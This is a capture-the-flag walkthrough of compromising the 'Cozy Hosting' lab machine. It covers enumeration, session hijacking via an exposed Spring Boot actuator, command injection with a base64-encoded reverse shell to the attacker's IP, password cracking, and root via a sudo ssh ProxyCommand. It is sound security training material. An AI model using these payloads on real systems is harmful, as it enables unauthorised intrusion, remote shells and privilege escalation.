In this CTF challenge, I’ll take you through my journey to compromise the Cozy Hosting server. The server had multiple vulnerabilities that allowed me to gain access to the system and eventually achieve root privileges.
Initial Scan
I began by conducting an initial scan of the target server using Nmap:
# Initial Nmap Scan
nmap -Pn -sVC -oN initial -A -vv 10.10.11.230The scan revealed two open ports: SSH on port 22 and HTTP on port 80. Here are the details of the discovered services:
- SSH: OpenSSH 8.9p1 running on Ubuntu.
- HTTP: nginx 1.18.0 on Ubuntu, which redirected to
http://cozyhosting.htb.
Comprehensive Port Scan
To get a better understanding of the server’s exposed services, I performed a comprehensive port scan:
# Comprehensive Port Scan
nmap -Pn -p- -A -vv --min-rate 10000 -oN allPorts 10.10.11.230This scan revealed more open ports and confirmed the previous findings:
- SSH: OpenSSH 8.9p1 on port 22.
- HTTP: nginx 1.18.0 on port 80.
Directory Bruteforce
Next, I decided to brute force directories using the ffuf tool to uncover hidden resources on the web server. Here's the command and some of the interesting results:
ffuf -u http://cozyhosting.htb/F -w ~/Tools/SecLists/Discovery/Web-Content/raft-small-words.txt:F/index: Status 200, Size: 12706, Words: 4263/login: Status 200, Size: 4431, Words: 1718/logout: Status 204/admin: Status 401
One of the discovered directories, /admin, hinted at potential admin functionality.
Identifying Spring Boot
During my web enumeration, I encountered a Spring Boot error page, suggesting that the server was running a Spring Boot application:
https://stackoverflow.com/questions/31134333/this-application-has-no-explicit-mapping-for-error this URL say its Spring boot
To further explore this, I ran a ffuf scan specifically for Spring Boot-related endpoints:
ffuf -u http://cozyhosting.htb/F -w ~/Tools/SecLists/Discovery/Web-Content/spring-boot.txt:FThis revealed several Spring Boot-related endpoints, including /actuator, /actuator/env, and /actuator/sessions.
output
ffuf -u http://cozyhosting.htb/F -w ~/Tools/SecLists/Discovery/Web-Content/spring-boot.txt:F
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0
________________________________________________
:: Method : GET
:: URL : http://cozyhosting.htb/F
:: Wordlist : F: /home/splitunknown/Tools/SecLists/Discovery/Web-Content/spring-boot.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
actuator [Status: 200, Size: 634, Words: 1, Lines: 1]
actuator/env/lang [Status: 200, Size: 487, Words: 13, Lines: 1]
actuator/env [Status: 200, Size: 4957, Words: 120, Lines: 1]
actuator/env/home [Status: 200, Size: 487, Words: 13, Lines: 1]
actuator/env/path [Status: 200, Size: 487, Words: 13, Lines: 1]
actuator/sessions [Status: 200, Size: 145, Words: 1, Lines: 1]
actuator/health [Status: 200, Size: 15, Words: 1, Lines: 1]
actuator/mappings [Status: 200, Size: 9938, Words: 108, Lines: 1]
actuator/beans [Status: 200, Size: 127224, Words: 542, Lines: 1]
:: Progress: [112/112] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::Exploiting /actuator/sessions
One endpoint that caught my attention was /actuator/sessions. I made a GET request to it, and it returned session information:
GET /actuator/sessions HTTP/1.1
Host: cozyhosting.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
HTTP/1.1 200
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 30 Sep 2023 13:39:07 GMT
Content-Type: application/vnd.spring-boot.actuator.v3+json
Connection: close
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Length: 245
{"DD207626C2966663F6EA33E58EAD579E":"UNAUTHORIZED","6314C2FCB475CE6F0169A64731533F0A":"UNAUTHORIZED","4A04E0CB83A78D6F6E893886AA6EBAC9":"UNAUTHORIZED","CFAB3789DEAE511EFF43C2117ED36327":"kanderson","6A015FE07E3BA95AA001A5AA013F9B48":"kanderson"}This exposed both authorized and unauthorized sessions. I extracted the JSESSIONID cookie for an authorized session.
Accessing Admin Functionality
With the JSESSIONID cookie set, I gained access to the admin portal. Here, I discovered an "Add Host" functionality.
Exploiting Host Addition
During the process of adding a host, I noticed potential command injection vulnerabilities. Here are the relevant requests and responses:
- Adding a host with an empty username field (resulted in an error):
Request:
POST /executessh HTTP/1.1
Host: cozyhosting.htb
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://cozyhosting.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cozyhosting.htb/admin?error=Host%20key%20verification%20failed.
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: JSESSIONID=CFAB3789DEAE511EFF43C2117ED36327
Connection: closeHTTP/1.1 302
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 30 Sep 2023 14:50:51 GMT
Content-Length: 0
Location: http://cozyhosting.htb/admin?error=Host key verification failed.
Connection: close
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENYRequest:
POST /executessh HTTP/1.1
...
host=10.10.11.230&username=Response:
Location: http://cozyhosting.htb/admin?error=usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface] ...- Attempting to bypass the username check using
${IFS}(resulted in an error about whitespaces):
Request:
POST /executessh HTTP/1.1
...
host=10.10.11.230&username=${IFS}ls${IFS}-laResponse:
Location: http://cozyhosting.htb/admin?error=Username can't contain whitespaces!- Successfully bypassing username restrictions with a payload:
Request:
POST /executessh HTTP/1.1
...
host=10.10.11.230&username=;echo${IFS}c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuOS84MCAwPiYx|${IFS}base64${IFS}-d|${IFS}bash;This payload allowed remote code execution and gave me shell access.
payload contain base64 of
sh -i >& /dev/tcp/10.10.16.9/80 0>&1Decompiling the JAR File
Inside the server, I found a JAR file named cloudhosting-0.0.1.jar. After transferring it to my local machine, I decompiled it using jdec. Within the decompiled code, I discovered the PostgreSQL database credentials:
spring.datasource.driver-class-name=org.postgresql.Driver
spring.datasource.url=jdbc:<DBUser>://<HOST>:<PORT>/<DB>
spring.datasource.username=<USER>
spring.datasource.password=<PASSWORD>
Gaining Database Access
I logged into the PostgreSQL database with the discovered credentials:
psql -U user -p port -h host
Password for user postgres: <PASSWORD>I explored the available databases and found cozyhosting. Inside this database, I found a users table:
\c cozyhosting
\d users
Querying the users table, I found two users: kanderson and admin.
Cracking Admin Password
I attempted to crack the admin’s password hash using John the Ripper with the rockyou wordlist:
john-the-ripper --wordlist=/home/splitunknown/Tools/SecLists/Passwords/Leaked-Databases/rockyou.txt adminHash
After some time, the password was successfully cracked.
SSH Access as Josh
With the admin password in hand, I tried to log in as Josh via SSH:
ssh josh@10.10.11.230After entering the cracked password, I gained access to Josh’s account.
Privilege Escalation
I discovered that Josh had sudo privileges for running SSH as root without a password:
sudo -lA simple GTFOBins
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *sudo -u root ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
With root access, I successfully rooted the Cozy Hosting server.
In this Cozy Hosting Box, we embarked on a journey that began with an initial scan, eventually leading us to root the server. We exploited various vulnerabilities, including directory brute forcing, session manipulation, and command injection. Along the way, we uncovered sensitive database credentials, cracked an admin password, and escalated privileges. This experience highlights the importance of thorough enumeration and persistence in tackling complex penetration testing scenarios. Remember, in the world of cybersecurity, persistence pays off, and there’s always more to discover. Happy hacking!